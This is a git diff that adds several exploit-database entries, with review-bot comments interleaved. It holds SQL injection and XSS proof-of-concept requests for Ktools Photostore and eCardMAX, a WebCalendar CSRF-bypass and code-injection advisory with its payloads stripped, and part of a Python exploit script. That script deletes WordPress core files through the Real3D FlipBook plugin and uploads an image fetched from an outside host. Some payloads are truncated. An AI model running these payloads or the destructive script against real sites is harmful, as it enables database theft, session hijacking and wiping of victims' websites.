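Review bot: Line 644 reads `stat(TARGET_PATH, ¤tStatData);` — the `¤` is almost certainly `&currentStatData` after an HTML entity decode (`&curren` → `¤`), so the file does not compile as shown and the original `&` should be restored. The exploit's mechanism deserves an explicit lab-only warning at the top: between the write at lines 665-669 and the restore at 681-683 the system-wide `/lib/x86_64-linux-gnu/libpam.so.0.83.1` is the payload, so any process that loads libpam in that window gets it too — root processes hit `exit(0)` in `_libInit` (line 559) and non-root ones get the empty `pam_*` stubs at 570-581 — meaning concurrent sshd/sudo/cron logins on the host may fail or be killed while `--Upgrade` runs. `TARGET_PATH` on line 538 is pinned to one libpam build; a comment such as `// adjust to the libpam SONAME target on the host (readlink /lib/x86_64-linux-gnu/libpam.so.0)` would save the next reader a failed `assert(targetFd>=0)`. The `symlink()` loop at 629-640 also aborts via `assert` on EEXIST if an earlier run left an entry in `input/`, which is worth noting for re-runs.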
diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt
new file mode 100755
index 000000000..5d19192b9
--- /dev/null
+++ b/platforms/php/webapps/40051.txt
@@ -0,0 +1,99 @@
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
+# Bug discovered by Yakir Wizman
+# Date 01/07/2016
+# Affected versions prior to 4.7.5
+# Vendor Homepage - http://www.ktools.net
+
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# Author will be not responsible for any damage.
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# About the Application:
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
+#
+# Sell various sizes or formats of the same photo.
+# Sell photos, vector art, zip files and more.
+# Sell videos PhotoStore Pro Only
+# Sell prints, artwork, products, packages, digital collections and more.
+# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
+# Email notifications to both you and the customer upon purchase.
+# Customers can instantly download after payment.
+# Customers can instantly download their files after payment.
+# Connects to PayPal and 2Checkout.
+# Built in credit system to allow your customers to buy credits.
+# Allow your members to upload and sell their photos and other media while you take a commission.
+
+# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
+# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
+# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
+
+
+
+# SQL Injection (error based) Proof-Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# SQL Injection (Severity is Critical)
+# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
+# Request Data #1 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: www.ktoolsdemos.net
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 221
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+###
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+###
+# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
+# Request Data #2 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://server/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: server
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 57
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
+
+
+
+# Cross Site Scripting Proof—Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# XSS (Severity is Medium)
+# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
+#
+# In Order to exploit this vulnerability, the URL should be like the following examples:
+#
+# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“>
+# http://server/photostore/manager/mgr.login.php?username=demo&password='>alert(/makman/)'}
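Review bot: The affected-version statements contradict each other — line 724 says `<= 4.7.5` while line 727 says "prior to 4.7.5" — and a reader deciding whether to patch needs one answer; pick the one that matches what was tested and state it once. Both injection points (`gallerySortType` on line 773, `gallerySortBy` on line 796) sit in the ORDER BY position, which cannot be fixed with bound parameters; the remediation note a practitioner wants is `validate gallerySortBy against an allow-list of column names and gallerySortType against {asc, desc} before interpolating`. The XSS examples at lines 810-811 are truncated (the payload after `“>` and the closing of the `alert(/makman/)` string are missing, and the quotes are typographic), so they will not work as copied. The first request (line 767) targets the vendor's public demo host with live-looking session cookies; those should be scrubbed to placeholders like the `server` used in the second request.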
+ imageUrl = 'http://makman.tk/makman.jpg'
+ wpFilesUrl = 'http://makman.tk/wpFiles.json'
+
+ def __init__(self, url):
+ url = url.rstrip('/')
+ if 'http://' in url or 'https://' in url:
+ self.url = url
+ else:
+ self.url = 'http://' + url
+
+ def http(self, url, data = {}, post = False):
+ try:
+ if post:
+ r = requests.post(url, data = data, headers = self.headers, timeout = 20)
+ else:
+ r = requests.get(url, params = data, headers = self.headers, timeout = 20)
+ except:
+ exit('[-] Something went wrong. Please check your internet connection')
+ return r
+
+ def deleteFiles(self):
+ print('[+] Loading Wordpress file structure')
+ r = self.http(self.wpFilesUrl)
+ wpFiles = json.loads(r.text)
+ print('[+] Wordpress File structure loaded successfully')
+ print('[+] Creating directory real3dflipbook')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
+ print('[+] Deleting Files from wp-includes/ & wp-admin/')
+ for wpFile in wpFiles['wpFiles']:
+ print(' [+] Deleting File ' + wpFile)
+ self.payload1['deleteBook'] = wpFile
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
+ print('[+] Files have been deleted successfully')
+
+ def uploadImage(self):
+ print('[+] Loading image file')
+ r = self.http('http://makman.tk/makman.jpg')
+ encodedImage = base64.b64encode(r.content)
+ self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
+ print('[+] Uploading image file in target root directory')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
+ print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
+
+ def xss(self):
+ print('[+] Checking XSS payload')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
+ if self.payload3['bookId'] in r.text:
+ print('[+] Found XSS here :')
+ print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
+
+#########################################################################################################
+
+def banner():
+ os.system('cls' if os.name == 'nt' else 'clear')
+ tabs = ' '
+ print(tabs + '*******************************************************************')
+ print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')
+ print(tabs + '* [+] Multiple Vulnerabilities Found by: *')
+ print(tabs + '* [+] https://mukarramkhalid.com *')
+ print(tabs + '*******************************************************************\n\n')
+
+def main():
+ banner()
+ url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
+ exploit = wpFlipbook(url)
+ exploit.deleteFiles()
+ exploit.uploadImage()
+ exploit.xss()
+ print('[+] Done')
+
+if __name__ == '__main__':
+ try:
+ main()
+ except KeyboardInterrupt:
+ exit('\n[-] CTRL-C detected.\n')
+# End
\ No newline at end of file
diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt
new file mode 100755
index 000000000..406c391be
--- /dev/null
+++ b/platforms/php/webapps/40057.txt
@@ -0,0 +1,269 @@
+[+] Credits: John Page aka HYP3RLINX
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==========================
+www.k5n.us/webcalendar.php
+
+
+
+Product:
+==================
+WebCalendar v1.2.7
+
+WebCalendar is a PHP-based calendar application that can be configured as a
+single-user calendar, a multi-user calendar for groups of users, or as an
+event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
+Interbase, MS SQL Server, or ODBC is required.
+
+WebCalendar can be setup in a variety of ways, such as...
+
+A schedule management system for a single person
+A schedule management system for a group of people, allowing one or more
+assistants to manage the calendar of another user
+An events schedule that anyone can view, allowing visitors to submit new
+events
+A calendar server that can be viewed with iCalendar-compliant calendar
+applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
+RSS-enabled
+applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
+
+
+
+
+Vulnerability Type:
+======================
+CSRF PROTECTION BYPASS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+WebCalendar attempts to uses the HTTP Referer to check that requests are
+originating from same server as we see below.
+
+From WebCalendar "include/functions.php" file on line 6117:
+
+////////////////////////////////////////////////////////////
+
+function require_valide_referring_url ()
+{
+
+ global $SERVER_URL;
+
+
+if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Missing the REFERER value
+
+ //die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ // Unfortunately, some version of MSIE do not send this info.
+
+ return true;
+ }
+
+if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Gotcha. URL of referring page is not the same as our server.
+
+// This can be an instance of XSRF.
+
+// (This may also happen when more than address is used for your server.
+
+// However, you're not supposed to do that with this version of
+
+// WebCalendar anyhow...)
+ die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ }
+
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////
+
+However, this can be easily defeated by just not sending a referer. HTML 5
+includes a handy tag to omit the
+referer
+when making an HTTP request, currently supported in Chrome, Safari,
+MobileSafari and other WebKit-based browsers. Using this meta tag we send
+no referrer
+and the vulnerable application will then happily process our CSRF requests.
+
+
+
+Exploit code(s):
+===============
+
+1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
+victim user is required for success.
+
+
+
+
+
+
+
+2) CSRF Protection Bypass modify access controls under "System Settings" /
+"Allow public access"
+
+
+
+
+
+
+#######################################################
+
+Vulnerability Type:
+======================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Since WebCalendars install script is not removed after installation as
+there is no "automatic" removal of it, low privileged users can inject
+arbitrary
+PHP code for the "Database Cache" directory value as no input validation
+exists for this when a user installs the application using the WebCalendar
+walk
+thru wizard.
+
+If WebCalendars installation script is available as part of a default
+image, often as a convenience by some hosting providers, this can be used
+to gain
+code execution on the target system. The only item that is required is the
+user must have privileges to authenticate to the MySQL Database and to run
+the
+install script. So, users who have install wizard access for the
+WebCalendar application will now have ability to launch arbitrary system
+commands on the
+affected host.
+
+One problem we must overcome is WebCalendar filters quotes " so we cannot
+use code like However, we can defeat
+this
+obstacle using the all to forgotten backtick `CMD` operator!.
+
+e.g.
+
+*/?>
+
+This results in "settings.php" being injected like...
+
+
+readonly: false
+user_inc: user.php
+use_http_auth: false
+single_user: false
+# end settings.php */
+?>
+
+
+
+Exploitation steps(s):
+=====================
+
+1) Login to the WebCalendar Installation Wizard.
+
+2) When you get to WebCalendar Installation Wizard Step 2 of the install
+script.
+http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
+
+3) Click "Test Settings" button to ensure connection to the Database.
+4) Enter below PHP code for the "Database Cache Directory:" input fields
+value to pop calculator for POC (Windows).
+
+*/?>
+
+5) Click "Next" button
+6) Click "Next" button
+7) Click "Save settings" button
+
+BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
+
+If you happen to get following error when clicking "Test Settings" button,
+"Failure Reason: Database Cache Directory does not exist", just click back
+button then forward or just "Test settings" button again to try get past
+the error.
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification: No replies
+July 4, 2016 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+================
+6.8 (Medium)
+CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
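Review bot: The quoted referer check `if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) )` has a second weakness the Vulnerability Details section does not mention: besides the empty-Referer branch returning true, the pattern is unanchored and `$SERVER_URL` is interpolated unescaped, so the test is a substring match rather than an origin comparison (unless `$SERVER_URL` is anchored elsewhere, which this excerpt does not show). The defender-side point worth stating is that Referer inspection is not a CSRF control at all; the fix is a per-session synchronizer token validated on every state-changing handler, with SameSite cookies as defense in depth. For the PHP code injection section, the mitigation to record is that the install/ directory must be removed or access-restricted after setup, and the "Database Cache Directory" value must be validated as a filesystem path and escaped before being written into settings.php. The two "Exploit code(s)" blocks and the example payload lines appear empty or truncated in this hunk, presumably stripped markup; confirm the committed file is intact.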
diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt
new file mode 100755
index 000000000..30405c510
--- /dev/null
+++ b/platforms/php/webapps/40058.txt
@@ -0,0 +1,98 @@
+eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
+
+
+[Software]
+
+- eCardMAX 10.5
+
+
+[Vendor]
+
+- eCardMAX.COM - http://www.ecardmax.com/
+
+
+[Vendor Product Description]
+
+- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
+own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
+with eCardMax is fast and easy.
+
+
+[Advisory Timeline]
+
+- 13/06/2016 -> Vulnerability discovered;
+- 13/06/2016 -> First contact with vendor;
+- 13/06/2016 -> Vendor responds asking for details;
+- 14/06/2016 -> Vulnerability details sent to the vendor;
+- 17/06/2016 -> Vendor working on a patch;
+- 28/06/2016 -> Vendor Releases Patch
+- 01/07/2016 -> Public Security Advisory Published
+
+
+[Bug Summary]
+
+- SQL Injection
+
+- Cross Site Scripting (Reflected)
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- v10.5
+
+
+[Tested on]
+
+- Apache/2.2.26
+- PHP/5.3.28
+- MySQL/5.5.49-cll
+
+
+[Bug Description and Proof of Concept]
+
+- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
+arbitrary SQL code.
+
+- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
+is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
+browser session in context of an affected site.
+
+
+[Proof-of-Concept]
+
+1. SQL Injection:
+
+Parameter: row_number (GET)
+POC URL:
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+2. Cross Site Scripting (Reflected):
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
+Parameter(s): keyword (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
+Parameter(s): page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
+Parameter(s): row_number (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
+Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+Parameter(s): keyword (GET)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file
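Review bot: The Advisory Timeline records a vendor patch on 28/06/2016, but the advisory never names the fixed version, so a reader cannot tell whether a given installation is remediated; a line such as `- Fixed in: <vendor patch/version — confirm with vendor>` under [Affected Version] would close that gap. The [Bug Description] attributes the SQL injection to the 'row_number' GET parameter reaching queries unsanitised; the remediation worth stating is parameterised queries (prepared statements) rather than input filtering, plus contextual output encoding for the reflected parameters listed under the XSS section.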